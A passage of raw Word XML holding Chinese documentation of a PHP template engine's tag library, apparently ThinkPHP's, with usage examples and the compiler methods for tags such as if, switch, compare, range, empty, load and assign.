          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D01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见</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0FE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ccess public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D074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C8BE5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1DFF7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6D9C15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F0BF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Elseif($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E374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FBE0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 = !empty($tag['expression']) ? $tag['expression'] : $tag['condition'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE44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dition = $this-&gt;parseCondition($condition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03552C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elseif(' . $condition . '): ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758972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4FB8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A0F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582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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0020A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见</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AA5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228C1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2B577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36BE5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6C3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Else($tag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D93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3DE1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else: ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F74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7E19A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304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1F3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switch</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FC90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08360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switch name="a.name"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCFD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se value="1" break="false"}1{/case}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4233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se value="2" }2{/case}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CA75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efault /}other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C00E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switch}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7965C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50277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1508CA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0D6034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3ED10E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2D4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Switch($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E50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0ACA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empty($tag['expression']) ? $tag['expression'] : $tag['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B18C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510A8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switch(' . $name . '): ?&gt;' . $content . '&lt;?php endswitch; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFB01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2A80C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959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28A5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se</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要配合</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>switch</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>才有效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69B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23B71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4313E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6C90A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04090A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D2C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tagCase($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566EFA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7BB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empty($tag['expression']) ? $tag['expression'] : $tag['value'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F9E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value, 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA89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3D90F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value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD45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case ' . $value . ':';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DCF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if (strpos($value, '|')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303DEE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s = explode('|', $value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F0E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB810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alues as $val) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5353E9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case "' . addslashes($val) . '":';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553A37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F3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529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case "' . $value . '":';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37651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A735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 . $value . ' ?&gt;' . $content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CBE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Break  = isset($tag['break']) ? $tag['break'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AB9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isBreak || $isBreak) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317BC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break; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A60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6BBF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179A7A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4F0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F437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efault</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要配合</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>switch</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>才有效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0AE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使用：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> {default /}ddfdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E778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3A1350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12081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5AE17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163328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B81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Default($tag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA57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974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default: ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCC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692AE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5329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5BA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ompare</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219F5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用于值的比较</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> eq neq gt lt egt elt heq nheq </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>默认是</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD5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compare name="" type="eq" value="" }content{/compare}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C372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7A2D8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40DE02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2020A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1F925B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DFD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Compare($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A79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29FF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10468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ag['value'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D665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sset($tag['type']) ? $tag['type'] : 'eq'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA9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4BF62A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lag  = substr($value, 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD882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360918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value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16101F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38A4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 . $value . '\'';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB19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46B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type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A49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equal':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAAC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eq';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA01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2DB5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notequal':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746FBF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neq';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1626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2BF8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07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this-&gt;parseCondition(' ' . $type . ' ');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C38D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 . $name . ' ' . $type . ' ' . $value . '): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102053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43328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E47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C6D1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ange</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026AE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如果某个变量存在于某个范围</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则输出内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> type= in </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表示在范围内</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>否则表示在范围外</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B656A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range name="var|function"  value="val" type='in|notin' }content{/range}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB5BD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xample: {range name="a"  value="1,2,3" type='in' }content{/range}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43228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EF04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02A1B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10E37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021DF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549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Range($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B2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67F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3F483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ag['value'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517E2A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sset($tag['type']) ? $tag['type'] : 'in'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A0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16C2CD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value, 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4CD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01D374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value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282EC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   = 'is_array(' . $value . ')?' . $value . ':explode(\',\',' . $value . ')';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2494F6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1C4BF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 . $value . '"';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F141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   = 'explode(\',\',' . $value . ')';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097AB5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9109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between' == $type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E32A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_RANGE_VAR_=' . $str . ';if(' . $name . '&gt;= $_RANGE_VAR_[0] &amp;&amp; ' . $name . '&lt;= $_RANGE_VAR_[1]):?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D09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if ('notbetween' == $type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26165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_RANGE_VAR_=' . $str . ';if(' . $name . '&lt;$_RANGE_VAR_[0] || ' . $name . '&gt;$_RANGE_VAR_[1]):?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D55C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E4D3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n      = ('in' == $type) ? 'in_array' : '!in_array';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AAD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 . $fun . '((' . $name . '), ' . $str . ')): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C050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7546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C48B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87C8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300A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resent</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67225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如果某个变量已经设置</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则输出内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC5F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present name="" }content{/present}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECF43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40667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3711D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43BFFF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37BD1F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76A3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Present($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B787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D45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2AE2E2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5D0719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isset(' . $name . ')): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C3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119118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57B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D258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notpresent</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39939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如果某个变量没有设置，则输出内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5B3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notpresent name="" }content{/notpresent}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF5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053398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276AD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49D71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5AEA4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B7D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Notpresent($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FBB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ABE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7EF74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6F6E11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isset(' . $name . ')): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA3E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68022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0105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373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mpty</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77841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如果某个变量为</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">empty </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则输出内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C53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empty name="" }content{/empty}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497EA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BADF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CCFE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4E970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132FB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307E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Empty($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67783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DEE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6B3E8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58A6E0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empty(' . $name . ') || (' . $name . ' instanceof \think\Collection &amp;&amp; ' . $name . '-&gt;isEmpty())): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150BD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01FEB1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2DE5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471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notempty</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E35D2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如果某个变量不为</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">empty </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则输出内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D2E2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notempty name="" }content{/notempty}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52378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368A47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1E10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6036F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36DDD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10DC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Notempty($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF5F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11D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3D836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74F90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empty(' . $name . ') || (' . $name . ' instanceof \think\Collection &amp;&amp; ' . $name . '-&gt;isEmpty()))): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117CB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79925A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A3B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04B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判断是否已经定义了该常量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1D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efined name='TXT'}</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已定义</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{/defined}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584B99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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674EB0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CD8F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791556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A14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Defined($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F981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8D35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4943B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defined("' . $name . '")): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C404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2EDC8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B226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8492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判断是否没有定义了该常量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EF4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notdefined name='TXT'}</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已定义</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{/notdefined}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545AC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399EA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165FC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7474F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7878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Notdefined($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA2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86D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name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CED2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defined("' . $name . '")): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013DAF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36813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AB4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7891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load </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> {load file="/static/js/base.js" /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60776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load file="/static/css/base.css" /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AFF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59A49E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1B5743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7DCD3D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45B9C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3872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Load($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73241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15B8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isset($tag['file']) ? $tag['file'] : $tag['href'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B44E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sset($tag['type']) ? strtolower($tag['type']) : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD7C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0CB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dStr   = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5192B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tag['value'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B4A6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ag['value'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160A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name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15044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sset(' . $name . ')';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607932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f(' . $name . '): ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D4D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dStr = '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEBF1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8E2B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 = explode(',', $file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2A5C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rray as $val) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0636F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strtolower(substr(strrchr($val, '.'), 1));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06095D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type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304BF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js':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3205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script type="text/javascript" src="' . $val . '"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10149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10AE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css':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0C3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link rel="stylesheet" type="text/css" href="' . $val . '" /&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61298E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25D51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php':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21175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include "' . $val . '"; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877E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B1CB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A49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AFF6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 . $endStr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039CD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7E6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D2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ssign</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B6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在模板中给某个变量赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支持变量赋值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9B3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assign name="" value="" /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0115B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386A6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64723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0D551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155D07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F34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Assign($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D258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7F08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his-&gt;autoBuildVar($tag['name']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B0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tag['value'], 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C242A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22736C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tag['value']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410B9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4FB7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 . $tag['value'] . '\'';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6F9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696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 . $name . ' = ' . $value . '; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49197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70858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E9B2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3D2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efine</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353D1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在模板中定义常量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
